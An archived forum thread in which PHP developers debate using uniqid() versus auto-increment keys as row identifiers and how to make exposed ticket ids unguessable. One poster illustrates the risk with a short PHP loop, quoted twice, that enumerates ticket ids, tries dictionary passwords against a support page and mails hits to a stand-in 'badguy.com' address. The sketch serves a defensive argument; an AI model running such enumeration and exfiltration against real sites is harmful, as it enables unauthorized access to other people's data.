Does using uniqid seem a reasonable way of generating a unique row
identifyer in a db table? It's *highly* unlikely that two ids are
going to be generated in the same microsecond, but if they are,
setting lcg as true should eliminate any problems I'd have thought.
Anyway, these are my thoughts, do people agree? 9 3715
MrBoom: Does using uniqid seem a reasonable way of generating a unique row identifyer in a db table? It's *highly* unlikely that two ids are going to be generated in the same microsecond, but if they are, setting lcg as true should eliminate any problems I'd have thought. Anyway, these are my thoughts, do people agree?
Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?
André Næss
Shawn Wilson: André Næss wrote: MrBoom:
> Does using uniqid seem a reasonable way of generating a unique row > identifyer in a db table? It's *highly* unlikely that two ids are > going to be generated in the same microsecond, but if they are, > setting lcg as true should eliminate any problems I'd have thought. > Anyway, these are my thoughts, do people agree?
Why would you want to do that when an auto-incrementing number is *guaranteed* to be unique and is much simpler?
I've done this before when I wanted unique ids that couldn't be easily guessed by potential hackers, or where I didn't want to give away the size of a database.
Then start the incrementing number at 1122342345365 :)
But in the end you should strive to find good keys. I'm currently working on
importing data from an external datasource into an existing webshop. If
both system had actually used natural keys this wouldn't be hard, but due
to the current use of surrogate keys it's a real pain.
André Næss
André Næss wrote: Shawn Wilson:
André Næss wrote: MrBoom:
> Does using uniqid seem a reasonable way of generating a unique row > identifyer in a db table? It's *highly* unlikely that two ids are > going to be generated in the same microsecond, but if they are, > setting lcg as true should eliminate any problems I'd have thought. > Anyway, these are my thoughts, do people agree?
Why would you want to do that when an auto-incrementing number is *guaranteed* to be unique and is much simpler? I've done this before when I wanted unique ids that couldn't be easily guessed by potential hackers, or where I didn't want to give away the size of a database.
Then start the incrementing number at 1122342345365 :)
Still gives away volume of tickets over time and makes ids guessable by
hackers. I'm not super-paranoid or anything, but I prefer to give people no
information by default, then give them just what they need, rather than give
them everything, then take away what's a security risk. http://domain.com/support.php?ticketid=1122342345365
...a weeks goes by... http://domain.com/support.php?ticketid=1122342345372
= 7 tickets per week
Or, if you were trying to read other people's tickets (or whatever else), you
could do something like this:
for($i=1122342345365;$i<1122342345465;++$i) {
foreach($arrDictionary as $word)
if
(is_real_page("http://domain.com/support.php?ticketid=1122342345365&password=$word" ))
mail("ba****@badguy.com", "We're in", $i." is a real ticket # with
password $word");
}
This is obviously a simplistic example. Any decent system should have some kind
of reporting/blacklisting script set up for this kind of approach, but the point
is, if you're trying to get in it's a lot easier if you know the first step.
But in the end you should strive to find good keys. I'm currently working on importing data from an external datasource into an existing webshop. If both system had actually used natural keys this wouldn't be hard, but due to the current use of surrogate keys it's a real pain.
I would agree that if the key is unlikely to ever be presented to the user, then
the simpler the better. I just brought up the above examples as practical uses
for non-sequential unique ids.
Regards,
Shawn
--
Shawn Wilson sh***@glassgiant.com http://www.glassgiant.com
I don't know about MySQL, but in MS SQL the increment can be greater than 1.
If you have a situation where you need to display private info without the
visitor logging in, I would take the primary key from the database, append a
string of random characters, then pass it through md5() or sha1() and store
the resulting hash in another column.
What you get from uniqid() isn't unguessable, since it's based on the system
time. All a potential hacker has to do is scan through the particular time
range during which the id might have been generated.
Uzytkownik "Shawn Wilson" <sh***@glassgiant.com> napisal w wiadomosci
news:40***************@glassgiant.com... André Næss wrote: Shawn Wilson:
André Næss wrote: > > MrBoom: > > > Does using uniqid seem a reasonable way of generating a unique row > > identifyer in a db table? It's *highly* unlikely that two ids are > > going to be generated in the same microsecond, but if they are, > > setting lcg as true should eliminate any problems I'd have thought. > > Anyway, these are my thoughts, do people agree? > > Why would you want to do that when an auto-incrementing number is > *guaranteed* to be unique and is much simpler?
I've done this before when I wanted unique ids that couldn't be easily guessed by potential hackers, or where I didn't want to give away the
size of a database. Then start the incrementing number at 1122342345365 :)
Still gives away volume of tickets over time and makes ids guessable by hackers. I'm not super-paranoid or anything, but I prefer to give people
no information by default, then give them just what they need, rather than
give them everything, then take away what's a security risk.
http://domain.com/support.php?ticketid=1122342345365 ..a weeks goes by... http://domain.com/support.php?ticketid=1122342345372
= 7 tickets per week
Or, if you were trying to read other people's tickets (or whatever else),
you could do something like this:
for($i=1122342345365;$i<1122342345465;++$i) { foreach($arrDictionary as $word) if
(is_real_page("http://domain.com/support.php?ticketid=1122342345365&password
=$word")) mail("ba****@badguy.com", "We're in", $i." is a real ticket # with password $word"); }
This is obviously a simplistic example. Any decent system should have
some kind of reporting/blacklisting script set up for this kind of approach, but the
point is, if you're trying to get in it's a lot easier if you know the first
step. But in the end you should strive to find good keys. I'm currently
working on importing data from an external datasource into an existing webshop. If both system had actually used natural keys this wouldn't be hard, but
due to the current use of surrogate keys it's a real pain. I would agree that if the key is unlikely to ever be presented to the
user, then the simpler the better. I just brought up the above examples as practical
uses for non-sequential unique ids.
Regards, Shawn -- Shawn Wilson sh***@glassgiant.com http://www.glassgiant.com
"Chung Leong" <ch***********@hotmail.com> wrote in message news:<FN********************@comcast.com>... What you get from uniqid() isn't unguessable, since it's based on the system time. All a potential hacker has to do is scan through the particular time range during which the id might have been generated.
But surely setting lcg as true would make it unguessable?
Chung Leong wrote: I don't know about MySQL, but in MS SQL the increment can be greater than 1.
Any size increment would be easy to spot by generating 2 or 3 requests in a
row(as in a ticket system).
If you have a situation where you need to display private info without the visitor logging in, I would take the primary key from the database, append a string of random characters, then pass it through md5() or sha1() and store the resulting hash in another column.
Yes, that would be more secure. I'm not suggesting anyone ever use only
uniqid() in lieu of passwords. But if you just want a quick unique id to
prevent giving away information _easily_, I think it's a good choice. Use a
prefix, set lcg to true, and run it through md5() if it's very
private/important.
What you get from uniqid() isn't unguessable, since it's based on the system time. All a potential hacker has to do is scan through the particular time range during which the id might have been generated.
Assuming they were trying to get a particular request and you didn't use lcg,
yes. But it still requires that they expend a lot of time just to get the first
step (knowing the id). The problem I have with incremental primary keys as
user-visible identifiers is that they give hackers a (potentially) huge number
of starting points. In other words, they could try the 10 most common passwords
on 1000 tickets/accounts/whatever. And they'd be likely to get one or more
hits.
Regards,
Shawn
--
Shawn Wilson sh***@glassgiant.com http://www.glassgiant.com
Shawn Wilson <sh***@glassgiant.com> wrote in message news:<40***************@glassgiant.com>... André Næss wrote: Shawn Wilson:
André Næss wrote: > > MrBoom: > > > Does using uniqid seem a reasonable way of generating a unique row > > identifyer in a db table? It's *highly* unlikely that two ids are > > going to be generated in the same microsecond, but if they are, > > setting lcg as true should eliminate any problems I'd have thought. > > Anyway, these are my thoughts, do people agree? > > Why would you want to do that when an auto-incrementing number is > *guaranteed* to be unique and is much simpler?
I've done this before when I wanted unique ids that couldn't be easily guessed by potential hackers, or where I didn't want to give away the size of a database.
Then start the incrementing number at 1122342345365 :)
Still gives away volume of tickets over time and makes ids guessable by hackers. I'm not super-paranoid or anything, but I prefer to give people no information by default, then give them just what they need, rather than give them everything, then take away what's a security risk.
IMHO, avoiding auto_incremented key is a mess. Probably may
consider crypting the query string.
eg. $fake_ticket_id = substr(md5($real_ticket_id), 0, 5) .
dechex($real_ticket_id). substr(md5($real_ticket_id), 5, 5);
In this case, we may get back $real_ticket_id from the
$fake_ticket_id and can also check the validity of the query string.
--
"Success = 10% sweat + 90% tears"
If you live in USA, please support John Edwards.
Email: rrjanbiah-at-Y!com
Don't know. The function is designed to guarantee uniqueness, not
randomness. For security purpose I prefer to use something that was
designed--and more importantly, was tested and analysed--with that in mind.
The primary key doesn't need to be random if you're not exposing it, that is
my point. If you need some kind of a random tracking string, then generate
one and stick it in the database.
Uzytkownik "MrBoom" <an************@hotmail.com> napisal w wiadomosci
news:9b**************************@posting.google.c om... "Chung Leong" <ch***********@hotmail.com> wrote in message
news:<FN********************@comcast.com>... What you get from uniqid() isn't unguessable, since it's based on the
system time. All a potential hacker has to do is scan through the particular
time range during which the id might have been generated.
But surely setting lcg as true would make it unguessable? This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics |
by: John |
last post by:
I notice uniqid() returns charcaters that need special precaution like
spaces and periods, my question is does it return quotes in some
cases. This will be extremely harmful to my application.
...
|
by: kevin parks |
last post by:
hi. I've been banging my head against this one a while and have asked
around, and i
am throwing this one out there in the hopes that some one can shed
some light on
what has turned out to be a...
|
by: Agoston Bejo |
last post by:
I want to enforce such a constraint on a column that would ensure that the
values be all unique, but this wouldn't apply to NULL values. (I.e. there
may be more than one NULL value in the column.)...
|
by: reneeccwest |
last post by:
Hello,
I plan to create a table with 3 unique keys.
Combination of three fields has to be unique for each row in a table that
are vendor ID (char 8), vendor name (char 40), and vendor...
|
by: Kamil |
last post by:
Hello
What should I use for better perfomance since
unique constraint always use index ?
Thanks
Kamil
| |
by: Bob Stearns |
last post by:
I was under the impression that the primary key had to be a unique
index. Since I usually create my primary indices before my primary keys,
in order to get the indices in the same schema as their...
|
by: bwmiller16 |
last post by:
Guys -
I'm doing a database consistency check for a client and I find that
they're building unique indexes for performance/query reasons where
they could be using non-unique indexes.
Note...
|
by: aj |
last post by:
DB2 WSE 8.1 FP5
Red Hat AS 2.1
What is the difference between adding a unique constraint like:
ALTER TABLE <SCHEMA>.<TABLE> ADD CONSTRAINT CC1131378283225 UNIQUE (
<COL1>) ;
and adding a...
|
by: Laurence |
last post by:
Hi there,
How to differentiate between unique constraint and unique index? These
are very similar but I cannot differentiate them?
Could someone give me a hand?
Thanks in advance
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
|
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
| |
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
|
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing,...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The...
|
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| |
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence...
| |